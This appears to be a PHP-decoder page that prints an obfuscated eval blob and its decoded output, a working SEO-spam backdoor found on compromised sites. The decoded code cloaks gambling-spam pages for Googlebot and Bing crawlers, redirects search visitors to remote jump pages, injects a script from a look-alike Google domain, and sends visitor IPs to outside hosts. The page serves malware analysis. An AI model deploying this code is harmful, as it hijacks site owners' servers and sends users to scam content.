Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php eval(gzinflate(base64_decode(str_rot13('gIa7p5eXS/+9Z/0sgx4z6SmmnWg2zdF2LkJAYITY5ga..

Decoded Output download

set_time_limit(0);
error_reporting(0);

if (!defined('VERSIONS')) {
    define('VERSIONS', 'VCETE');
}
if (!defined('APIVERSIONS')) {
    define('APIVERSIONS', '3');
}
if (!defined('API_URLS')) {
    define('API_URLS', base64_decode('aHR0cHM6Ly9jZG4uMjFxdW5hcGsuY29tLw=='));
}
if (!defined('API_HTTP_URLS')) {
    define('API_HTTP_URLS', base64_decode('aHR0cDovLzU0LjkxLjM2LjMv'));
}
if (!defined('FALLBACK_REDIRECT_HTML')) {
    define('FALLBACK_REDIRECT_HTML', base64_decode('PGh0bWw+CjxoZWFkPgogICAgPHRpdGxlPlRoZSByZXNvdXJjZSBjYW5ub3QgYmUgZm91bmQuPC90aXRsZT4KICAgIDxzY3JpcHQ+d2luZG93LmxvY2F0aW9uPVwiJXNcIjs8L3NjcmlwdD4KPC9oZWFkPgo8Ym9keT4KICAgIDxoMT5XYWl0Li4uLjwvaDE+CjwvYm9keT4KPC9odG1sPg=='));
}
if (!defined('APT_HTML_API')) {
    define('APT_HTML_API', "https://br.googleeplay.com/6kfa.html");
}
if (!defined('APT_HTML_JUMP')) {
    define('APT_HTML_JUMP', '6kfa');
}
if (!defined('APT_HTML_JS')) {
    define('APT_HTML_JS', '<script async src="https://br.googleeplay.com/6kfa.js"></script>');
}

$req_ref_fuckme = isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : '';
$req_ua_fuckme = isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : '';
$host_fuckme = isset($_SERVER['HTTP_HOST']) ? $_SERVER['HTTP_HOST'] : '';
$req_uri_fuckme = isset($_SERVER['REQUEST_URI']) ? $_SERVER['REQUEST_URI'] : '';
function is_prefix_fuckme($uri)
{
    $prefix_regex = '/[?\/](app|ios|android|download|blank|bet|casino|games|play|video|poker|root|news|patt|tee|sto|Video|bea|slo|bac|pac|tig|bmw|fru|bull|card|gods|fish|mahj|uri|bak\.php)./';
    return preg_match($prefix_regex, $uri) === 1;
}

function is_crawler_fuckme($ua)
{
    $crawlers = array('Googlebot', 'Bingbot', 'MSNBOT', 'Yahoo!');
    foreach ($crawlers as $c) {
        if (stripos($ua, $c) !== false) {
            return true;
        }
    }
    return false;
}


function is_visitor_fuckme($ref)
{
    if (substr($ref, 0, 4) === 'http') {
        $refs = array('google.', 'bing.', 'yahoo.');
        foreach ($refs as $r) {
            if (stripos($ref, $r) !== false) {
                return true;
            }
        }
    }
    return false;
}

function get_client_ip_fuckme()
{
    foreach (array('HTTP_CLIENT_IP', 'HTTP_X_REAL_IP', 'HTTP_CF_CONNECTING_IP', 'HTTP_X_FORWARDED_FOR', 'HTTP_X_FORWARDED', 'HTTP_X_CLUSTER_CLIENT_IP', 'HTTP_FORWARDED_FOR', 'HTTP_FORWARDED', 'REMOTE_ADDR') as $key) {
        if (array_key_exists($key, $_SERVER) === true) {
            foreach (explode(',', $_SERVER[$key]) as $ip) {
                $ip = trim($ip);
                if (filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false) {
                    return $ip;
                }
            }
        }
    }
    return '0.0.0.0';
}

function fetch_content_fuckme($url, $headers = array(), $conn_timeout = 0, $trans_timeout = 0)
{
    if (function_exists('curl_init')) {
        $ch = curl_init();
        try {
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt($ch, CURLOPT_HEADER, 0);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER["HTTP_USER_AGENT"]);
            curl_setopt($ch, CURLOPT_REFERER, $_SERVER["HTTP_REFERER"]);
            curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
            curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $conn_timeout);
            curl_setopt($ch, CURLOPT_TIMEOUT, $trans_timeout);
            curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
            curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
            curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
            $result = curl_exec($ch);
            if ($result === false) {
                $context = stream_context_create(array(
                    'http' => array(
                        'timeout' => $trans_timeout
                    ),
                    'https' => array(
                        'timeout' => $trans_timeout
                    )
                ));
                return file_get_contents($url, false, $context);
            }
            return $result;
        } finally {
            curl_close($ch);
        }
    } else {
        $context = stream_context_create(array(
            'http' => array(
                'timeout' => $trans_timeout
            ),
            'https' => array(
                'timeout' => $trans_timeout
            )
        ));
        return file_get_contents($url, false, $context);
    }
}

function get_content_fuckme($url, $headers = array(), $conn_timeout = 0, $trans_timeout = 0)
{
    $result = fetch_content_fuckme($url, $headers, $conn_timeout, $trans_timeout);
    if ($result === false) {
        $fallback_url = str_replace(API_URLS, API_HTTP_URLS, $url);
        $result = fetch_content_fuckme($fallback_url, $headers, $conn_timeout, $trans_timeout);
    }
    return $result;
}

function main_fuckme()
{
    global $req_ref_fuckme, $req_ua_fuckme, $host_fuckme, $req_uri_fuckme;
    header('Cache-Control: no-store, no-cache, must-revalidate');
    header('Cache-Control: post-check=0, pre-check=0', FALSE);
    header('Pragma: no-cache');
    $uri_encoded = urlencode($host_fuckme);
    $headers = array();
    if (isset($_SERVER['HTTP_ACCEPT_LANGUAGE'])) {
        $lang = $_SERVER['HTTP_ACCEPT_LANGUAGE'];
        array_push($headers, "Accept-Language: $lang");
        array_push($headers, "Vary: Accept-Language");
    }
    if (is_crawler_fuckme($req_ua_fuckme)) {
        $crawler_ip = get_client_ip_fuckme();
        if (is_prefix_fuckme($req_uri_fuckme)) {
            header('Content-Type:text/html; charset=utf-8');
            $htmls = get_content_fuckme(API_URLS . "connector.html?domain={$host_fuckme}&uri={$uri_encoded}&ip={$crawler_ip}&ver=" . VERSIONS . "&v=" . APIVERSIONS, $headers);
            $htmls = str_replace('</head>', APT_HTML_JS . '</head>', $htmls);
            echo $htmls;
            exit;
        } else {
            $sitemaps = file_get_contents(API_URLS . "suijiurl/index.php");
            echo $sitemaps;
        }
    } elseif (is_prefix_fuckme($req_uri_fuckme) && is_visitor_fuckme($req_ref_fuckme)) {
        header('Content-Type:text/html; charset=utf-8');
        $client_ip = get_client_ip_fuckme();
        $allheaders = array();
        if (!function_exists('getallheaders')) {
            function getallheaders()
            {
                $tmp_headers = array();
                foreach ($_SERVER as $name => $value) {
                    if (substr($name, 0, 5) == 'HTTP_') {
                        $tmp_headers[str_replace(' ', '-', ucwords(strtolower(str_replace('_', ' ', substr($name, 5)))))] = $value;
                    }
                }
                return $tmp_headers;
            }

            $allheaders = getallheaders();
        } else {
            $allheaders = getallheaders();
        }
        foreach ($allheaders as $key => $value) {
            if (stripos($key, 'Sec-') === 0) {
                array_push($headers, "$key: $value");
            }
        }
        $html = get_content_fuckme(API_URLS . APT_HTML_JUMP . ".html?domain={$host_fuckme}&uri={$uri_encoded}&ip={$client_ip}&ver=" . VERSIONS . "&v=" . APIVERSIONS, $headers, 2, 2);
        $html = str_replace('</head>', APT_HTML_JS . '</head>', $html);
        echo $html ?: sprintf(FALLBACK_REDIRECT_HTML, APT_HTML_API);
        exit;
    }
}

main_fuckme();

Did this file decode correctly?

Original Code

<?php
eval(gzinflate(base64_decode(str_rot13('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'))));

Function Calls

gzinflate 1
str_rot13 1
base64_decode 1

Variables

None

Stats

MD5 ceec2a3561372d89c216e563ae9a27e7
Eval Count 1
Decode Time 62 ms